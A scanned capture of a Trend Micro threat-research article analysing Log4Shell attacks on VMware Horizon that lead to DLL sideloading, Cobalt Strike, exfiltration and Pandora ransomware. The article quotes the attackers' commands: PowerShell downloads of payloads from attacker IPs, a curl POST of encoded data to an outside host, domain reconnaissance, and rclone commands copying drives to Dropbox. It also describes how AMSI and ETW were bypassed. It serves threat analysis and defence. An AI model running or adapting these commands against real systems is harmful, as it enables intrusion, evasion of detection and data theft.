www.trendmicro.com
Open in
urlscan Pro
104.103.101.97
Public Scan
Submitted URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
Effective URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
Submission: On August 20 via api from DE — Scanned from DE
Effective URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
Submission: On August 20 via api from DE — Scanned from DE
Form analysis 2 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
</tr>
</tbody>
</table>
</div>
</form><form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form-mobile">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
<td class="gsc-search-close collapsed" style="width:1%;" data-target="#search-mobile-wrapper" data-toggle="collapse">
<span class="icon-close"></span>
</td>
</tr>
</tbody>
</table>
</div>
</form>Text Content
dismiss
4 Alerts
* Achieving better attack surface risk management with a unified cybersecurity
platform
dismiss
Learn more
* Trend Micro Vision One™: Detect, investigate, prioritize, and respond to
threats quicker
dismiss
Join live demos
* Metaworse? The Trouble with the Metaverse
dismiss
Learn more
* IDC announces Trend Micro is #1 in Cloud Workload Security Market Share
dismiss
Learn more
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Find a Partner
* Home Office Online Store
* Renew Online
* Contact Sales
* Locations Worldwide
* +202 25869400
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
Free trials
* Cloud
* Detection and Response
* User Protection
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
Business
For Home
Products Products
Trend Micro One - our unified cybersecurity platform >
Hybrid Cloud Security
Workload Security
Conformity
Container Security
File Storage Security
Application Security
Network Security
Open Source Security
Network Security
Intrusion Prevention
Advanced Threat Protection
Industrial Network Security
Mobile Network Security
Zero Trust Secure Access
User Protection
Endpoint Security
Email Security
Mobile Security
Web Security
Industrial Endpoint
Detection & Response
XDR
Risk Insights
Powered by
AI/Machine Learning
Global Threat Intelligence
All Products & Trials
Our Unified Platform
Service Packages
Small & Midsize Business Security
Solutions Solutions
For Cloud
Cloud Migration
Cloud-Native App Development
Cloud Operational Excellence
Data Center Security
SaaS Applications
Internet of Things (IoT)
ICS / OT
Connected Car
5G Security for Enterprises
Risk Management
Ransomware
Cyber Insurance
End-of-Support Systems
Compliance
Detection and Response
Industries
Healthcare
Manufacturing
Oil & Gas
Electric Utility
Knowledge Hub
Why Trend Micro Why Trend Micro
The Trend Micro Difference
Customer Successes
Strategic Alliances
Industry Leadership
Research Research
Research
About Our Research
Research and Analysis
Research, News and Perspectives
Security Reports
Security News
Zero Day Initiative (ZDI)
Blog
Research by Topic
Vulnerabilities
Annual Predictions
The Deep Web
Internet of Things (IoT)
Resources
DevOps Resource Center
CISO Resource Center
What Is?
Threat Encyclopedia
Cloud Health Assessment
Cyber Risk Assessment
Enterprise Guides
Glossary of Terms
EXPLORE THE CYBER RISK INDEX (CRI)
Use the CRI to assess your organization’s preparedness against attacks, and get
a snapshot of cyber risk across organizations globally.
Calculate your risk
Services & Support Services & Support
Services
Service Packages
Managed XDR
Support Services
Business Support
Log In to Support
Technical Support
Virus & Threat Help
Renewals & Registration
Education & Certification
Contact Support
Downloads
Free Cleanup Tools
Find a Support Partner
For Popular Products
Deep Security
Apex One
Worry-Free
Worry-Free Renewals
Partners Partners
Channel Partners
Channel Partner Overview
Managed Service Provider
Cloud Service Provider
Professional Services
Resellers
Marketplace
System Integrators
Alliance Partners
Alliance Overview
Technology Alliance Partners
Our Alliance Partners
Tools and Resources
Find a Partner
Education and Certification
Partner Successes
Distributors
Partner Login
Company Company
Overview
Leadership
Customer Success Stories
Strategic Alliances
Industry Accolades
Newsroom
Webinars
Events
Security Experts
Careers
History
Corporate Social Responsibility
Diversity, Equity & Inclusion
Internet Safety and Cybersecurity Education
Investors
Privacy and Legal
×
Folio (0)
4 Alerts
* Achieving better attack surface risk management with a unified cybersecurity
platform
dismiss
Learn more
* Trend Micro Vision One™: Detect, investigate, prioritize, and respond to
threats quicker
dismiss
Join live demos
* Metaworse? The Trouble with the Metaverse
dismiss
Learn more
* IDC announces Trend Micro is #1 in Cloud Workload Security Market Share
dismiss
Learn more
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Find a Partner
* Home Office Online Store
* Renew Online
* Contact Sales
* Locations Worldwide
* +202 25869400
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
Free trials
* Cloud
* Detection and Response
* User Protection
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
* Achieving better attack surface risk management with a unified cybersecurity
platform
dismiss
Learn more
* Trend Micro Vision One™: Detect, investigate, prioritize, and respond to
threats quicker
dismiss
Join live demos
* Metaworse? The Trouble with the Metaverse
dismiss
Learn more
* IDC announces Trend Micro is #1 in Cloud Workload Security Market Share
dismiss
Learn more
* No new notifications at this time.
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
* Find a Partner
* Home Office Online Store
* Renew Online
* Contact Sales
* Locations Worldwide
* +202 25869400
* The Americas
* United States
* Brasil
* Canada
* México
* Middle East & Africa
* South Africa
* Middle East and North Africa
* Europe
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* Asia & Pacific
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Cloud
* Detection and Response
* User Protection
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
undefined
Exploits & Vulnerabilities
Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware
Content added to Folio
Folio (0) close
Exploits & Vulnerabilities
LOG4SHELL VULNERABILITY IN VMWARE LEADS TO DATA EXFILTRATION AND RANSOMWARE
We analyzed cases of a Log4Shell vulnerability being exploited in certain
versions of the software VMware Horizon. Many of these attacks resulted in data
being exfiltrated from the infected systems. However, we also found that some of
the victims were infected with ransomware days after the data exfiltration.
By: Mohamed Fahmy June 28, 2022 Read time: 5 min (1464 words)
Save to Folio
--------------------------------------------------------------------------------
Trend Micro Research recently analyzed several cases of a Log4Shell
vulnerability being exploited in certain versions of the software VMware
Horizon. After investigating the chain of events, we found that many of these
attacks resulted in data being exfiltrated from the infected systems. However,
we also found that some of the victims were infected with ransomware days after
the data exfiltration.
This investigation is related to a recent report from security team Sentinel
Labs, which describes a technique used by the LockBit ransomware-as-a-service
(RaaS) that takes advantage of a command line utility in VMware. Their
investigation showed that through this utility, VMware is susceptible to
sideloading DLLs.
We spotted similar behavior to Sentinel Labs in terms of entry points and
sideloading, but the investigation, discussed in this article, focuses on
techniques of exfiltration and lateral movement.
Analyzing the attack kill chain
Entry point
The attack starts with exploiting the Log4j vulnerability (called Log4Shell) in
VMware Horizon. It then spawns a PowerShell instance to execute commands. The
threat actor uses PowerShell commands to discover the victim network, then
downloads mfeann.exe, LockDown.DLL, and c0000012.log. Here are the commands:
net group /domain
whoami
c:\windows\system32\net group /domain
c:\windows\system32\nltest /domain_trusts
c:\windows\system32\net user StantoDe /domain
c:\windows\system32\net time /domain
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/mfeann.exe -OutFile
C:\users\public\mfeann.exe
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/LockDown.DLL -OutFile
C:\users\public\LockDown.DLL
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/c0000012.log -OutFile
C:\users\public\c0000012.log
In the cases we analyzed, there were different files used to sideload malicious
DLLs. The file mfeann.exe is an executable responsible for event creation and
logging. It is a legitimate executable, signed by a known security company, but
we found that threat actors misused it to sideload a malicious DLL named
LockDown.DLL. In another intrusion we analyzed, the threat actor downloaded
another legitimate executable named VMwareXferlog.exe and used the same
technique to sideload the malicious DLL glib-2.0.DLL.
Figure 1. Mfeann.exe signature information
Figure 2. VMwareXferlog.exe signature information
See the actions below:
Invoke-WebRequest -uri http://45.61.139.38/VMwareXferlogs.exe -OutFile
c:\programdata\VMwareXferlogs.exe;
Invoke-WebRequest -uri http://45.61.139.38/glib-2.0.DLL -OutFile
c:\programdata\glib-2.0.DLL;
Invoke-WebRequest -uri http://45.61.139.38/vmtools.ini -OutFile
c:\programdata\vmtools.ini
The figure below shows the VMware Horizon Log4j exploitation, then the next step
of downloading the VMware utility and malicious DLL via PowerShell
(VMwareXferlog.exe and glib-2.0.DLL).
Figure 3. Process chain of infection (from TrendMicro Vision One)
Details of the DLL sideloading
Sideloading happens after the steps described earlier — the threat actor
successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and
c0000012.log.
Mfeann.exe is executed, an action which calls the LockDownProtectProcessById
function from LockDown.DLL. Then, the execution flows to the malicious payload
inside LockDown.DLL. This is the process:
powershell -c curl -uri hxxp://45[.]61.137.57:80 -met POST -Body
([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((C:\users\public\mfeann.exe)))))
Figure 4. Execution flow transferred to malicious LockDown.DLL via calling the
LockDownProtectProcessById function
The weaponized DLL checks for the presence of a debugger and tries to bypass
managed detection and response (MDR) and Microsoft's Antimalware Scan Interface
(AMSI) detection. It then decrypts c0000012.log, resulting in a CobaltStrike
payload (Sentinel Labs analyzed this in detail).
Here is a detailed sequence of actions:
1. The anti-debugging technique checks the BeingDebugged flag inside the PEB
structure.
Figure 5. Anti-debugging checks
2. Next, the process tries to bypass AMSI and Microsoft event tracking. The
loader attempts to evade detection in Event Tracing for Windows (ETW) and AMSI
by patching EtwEventWrite and AmsiScanBuffer APIs with return from procedure
(RET) instruction. The following function is used to patch both EtwEventWrite
and AmsiScanBuffer:
Figure 6. Technique used to bypass ETW and AMSI
Figures 7 and 8 show EtwEventWrite before and after patching.
Figure 7. EtwEventWrite before patching
Figure 8. EtwEventWrite after patching by return instruction(0xC3)
3. Finally, the loader starts to map the encrypted CobaltStrike payload,
decrypt, and load it.
Figure 9. Function to map and decrypt CobaltStrike payload
Figure 10. The same Function from glib-2.0.DLL with different encrypted file
name
Investigating notable techniques and tools
Identical loaders
In the intrusions that used mfeann.exe along with LockDown.DLL, or
VMwareXferlog.exe with glib-2.0.DLL, both loaders were almost identical.
Figure 11. Both loaders (the primary case showing the use of LockDown.DLL and
secondary showing the use of glib-2.0.DLL) are identical
Persistence
We also observed that the spawned WerFault.exe accessed lsass.exe, and this
indicates that credentials might have been dumped. Also, the threat actor
utilized existing accounts by adding them to the domain admin group so they can
blend in with the environment.
Figure 12. Adding account to domain admin group
Lateral movement to machines in the network
After the initial infection with Cobalt Strike, we observed that the threat
actor dropped node.exe, which is a stowaway proxy tool that is publicly
available on Github. The tool is written in the GO language and can provide many
capabilities to threat actors: remote shell execution, upload/downloading files,
and more. In this case, the tool is used to provide a reverse shell to threat
actors on IP: 45[.]32.108.54 on port 80.
After a successful connection with the command and control (C&C) IP, we saw
outbound traffic to several internal machines via SMB and WMI. The files
mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were
dropped on the identified internal machines.
Data exfiltration
In one case, we found an interesting binary file named update.exe. The file is
actually the rclone.exe tool used to exfiltrate data to a specific Dropbox
location. While uploading the data, the Rclone tool may upload to different IPs
over time:
162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)
CLI command:
cmd.exe /Q /c update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude
*.exe 1> \\127.0.0.1\ADMIN$\__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q --ignore-existing --max-age 2y --exclude
*.exe 1> \\127.0.0.1\ADMIN$\__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q --ignore-existing --max-age 2y --exclude
*.exe 1> \\127.0.0.1\ADMIN$\__1649007856.0151849 2>&1
In another intrusion, the same tool was used for data exfiltration using a
different name: Medias.exe.
Medias.exe copy '\\[Private IP] \G$' dropbox:ag -q --ignore-existing --max-age
2y --auto-confirm --multi-thread-streams 12 --transfers 10 --ignore-errors
--exclude "*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}"
Figure 13. Data exfiltration by the rclone.exe tool
After data exfiltration
In most of the analyzed intrusions, we saw the threat actors stopping after the
data exfiltration phase. However, in one instance, we observed a Pandora
ransomware infection 10 days after the data was exfiltrated.
The sequence of events was as follows: First, the stowaway hacking tool was
dropped after the malicious DLL is sideloaded via VMwareXferlog.exe utility.
Then, the Rclone tool (update.exe) was dropped and used for exfiltration. Ten
days later, we detected Pandora ransomware on the machine.
Attack stages
Figure 14. Timeline of data exfiltration and ransomware infection based on
investigated cases
We suspect that because there was a long period between exfiltration and
ransomware infection, there are threat actors who sell access to ransomware
groups after exfiltrating data. Selling access is nothing new in the underground
— once one threat actor is finished with their malicious activities, they can
sell their entry point to victims’ networks to other threat groups.
Latest observed loader
While hunting for loaders similar to LockDown.DLL and glib-2.0.DLL, we found a
similar loader that was submitted to Virus Total on June 22. The loader uses the
mfeann.exe ligament tool to sideload a malicious LockDown.dll. The observed
sample was dropped in a way that differs from the Log4j exploit — this one was
dropped via the .Net trojan “UnLockApps.exe.”
The trojan dropped three files at the location %appdata% \MfeannP1ugins:
* mfeann.exe: A ligament tool that sideloads the malicious LockDown.dll
* LockDown.dll: A malicious DLL
* avupdate_msg.avr: The encrypted cobalt strike payload
Although this LockDown.dll sample was created recently (June 5, 2022) it doesn’t
appear to be as complex as the older sample included in the previous sections.
It does not check the debugger environment or bypass security monitoring
solutions.
Figure 15. LockDownProtectProcessById function
This sample has the same main functionality as the previous one that loads an
encrypted file and then decrypts it, resulting in a Cobalt string payload.
Figure 16. Opening avupdate_msg.avr
Figure 17. The decryption key
Figure 18. Payload decryption function
Figure 19. Decrypted Cobalt payload
Security Solutions
A multilayered approach can help organizations defend against this and other
ransomware attacks using security technologies that can detect malicious
components and suspicious behavior.
* Trend Micro Vision One™ provides multilayered protection and behavior
detection, which helps block suspicious behavior and tools before the
ransomware can do any damage.
* Trend Micro Cloud One™ Workload Security protects systems against both known
and unknown threats that exploit vulnerabilities through virtual patching and
machine learning.
* Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and
advanced analysis techniques to effectively block malicious emails that can
serve as entry points for ransomware.
* Trend Micro Apex One™ offers automated threat detection and response against
advanced concerns such as fileless threats and ransomware, ensuring endpoint
protection.
For a complete list of the Indicators of Compromise, please download this
document.
MITRE ATT&CK
Tags
Cloud | Exploits & Vulnerabilities | Research | Network | Articles, News,
Reports
AUTHORS
* Mohamed Fahmy
Threat Intelligence Analyst
Contact Us
RELATED ARTICLES
* Protecting S3 from Malware: The Cold Hard Truth
* Analyzing the Hidden Danger of Environment Variables for Keeping Secrets
* What Exposed OPA Servers Can Tell You About Your Applications
See all articles
* Contact Sales
* Locations
* Careers
* Newsroom
* Trust Center
* Privacy
* Accessibility
* Support
* Site map
* linkedin
* twitter
* facebook
* youtube
* instagram
* rss
Copyright © 2022 Trend Micro Incorporated. All rights reserved.
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
AddThis Sharing Sidebar
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintMore AddThis
Share optionsAddThis
2
SHARES
Hide
Show
Close
AddThis